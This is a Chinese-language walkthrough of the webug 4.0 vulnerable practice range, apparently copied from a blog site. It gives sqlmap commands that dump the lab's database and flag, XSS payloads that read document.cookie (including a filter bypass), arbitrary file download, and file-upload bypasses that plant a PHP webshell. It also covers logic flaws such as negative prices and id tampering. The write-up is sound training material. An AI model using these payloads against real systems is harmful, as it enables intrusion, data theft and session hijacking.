注入
显错注入
随便加个符号,直接就爆出了SQL语句和闭合方式
很明显参数id存在sql注入,上sqlmap,这里是登录后才能打开这个网页,直接把数据包保存至kali桌面,数据包保存为1.txt
爆数据库,爆表
sqlmap -r 1.txt --dbs
sqlmap -r 1.txt -D webug --tables
爆字段
sqlmap -r 1.txt -D webug -T flag --cloumns
查看flag
sqlmap -r 1.txt -D webug -T flag -C flag --dump
布尔注入
打开靶场地址,把id参数改为-1,发现跟1比起来,内容缩短了一些,回显不一样
保存数据包到sqlmap跑一下,跟上关差不多,因为用到是基于时间的盲注,所以会很费时间
sqlmap -r 1.txt --dump -D webug -T flag -C flag
延时注入
跟上个一样,很费时间
post注入
搜索框输入1’ 会报错,注入点在这
猜字段
1' order by 3--+
1' order by 2--+
sqlmap
sqlmap -r '1.txt' -D webug -T flag -C flag --dump
过滤注入
同上,并没有过滤
宽字节注入
xxe注入
csv注入
万能密码登陆
密码处直接填写pyload
XSS
反射型xss
直接在url添加pyload
存储型xss
留言处添加pyload,之后刷新一下网页,就弹出来了
DOM型xss
输入框随意输入些东西,看一下位置value=“111”
构造pyload,点击搜索即可
"><script>alert(document.cookie)</script><
过滤xss
只是过滤了script,换个就是
<img src=1 onerror=alert(document.cookie)>
链接注入
构造pyload,点一下直接跳转到百度
<a%20href="http://baidu.com"><h5>点我点我点我点我点我点我</h5></a>
任意文件下载
任意文件下载
右击下载看一下链接地址
http://192.168.0.130/webug/control/filedownload/file_download.php?file=template/assets/img/1.txt
看到file协议使用不当就可能会造成任意文件下载,这里构造pyload试一下
file=/index.php
果然下载成功
mysql配置文件下载
上传漏洞
文件上传(前端拦截)
F12可以看到对上传的文件进行了后缀限制
把shell后缀改成png格式,抓包,在数据包中在改回php格式
上传成功
冰蝎连接成功
文件上传(解析漏洞)
这里我试了空格或者“.”绕过,::$DATA绕过,双后缀名绕过,%00截断但是都不可以,这里可以使用生僻字进行绕过,比如这个 龘(dá),在repeater里面将文件名改为 shell.php龘.jpg,发现上传成功,这是因为他无法对这个字进行编码,所以后面的信息全部被过滤掉了。最后就变成了php文件,人家是成功了,但我还是不行
文件上传(畸形文件)
双写绕过
文件上传(截断上传)
人家的,我依然不可以
文件上传(htaccess)
代码有问题,跳过
逻辑漏洞
越权修改密码
万能密码
支付漏洞
直接价格改成-1
这就成功了,离谱
邮箱轰炸
随便输入一个邮箱,因为没有任何防御措施,很可能造成邮箱轰炸,跟短信炸弹一个道理
越权查看admin
所谓越权就是用普通用户拥有管理员用户的权限,比如user的id=1,管理员的id=0,通过抓包修改这个参数,就可以达到越权的目的
其它
url跳转
更改url的跳转地址
文件包含
打开靶场,看到这个url,这。。。太明显了阿
配合一下刚刚的文件上传,直接就执行了phpinfo
文章来源:https://www.toymoban.com/news/detail-557373.html
结束
文章来源地址https://www.toymoban.com/news/detail-557373.html
到了这里,关于webug4.0靶场通关笔记的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!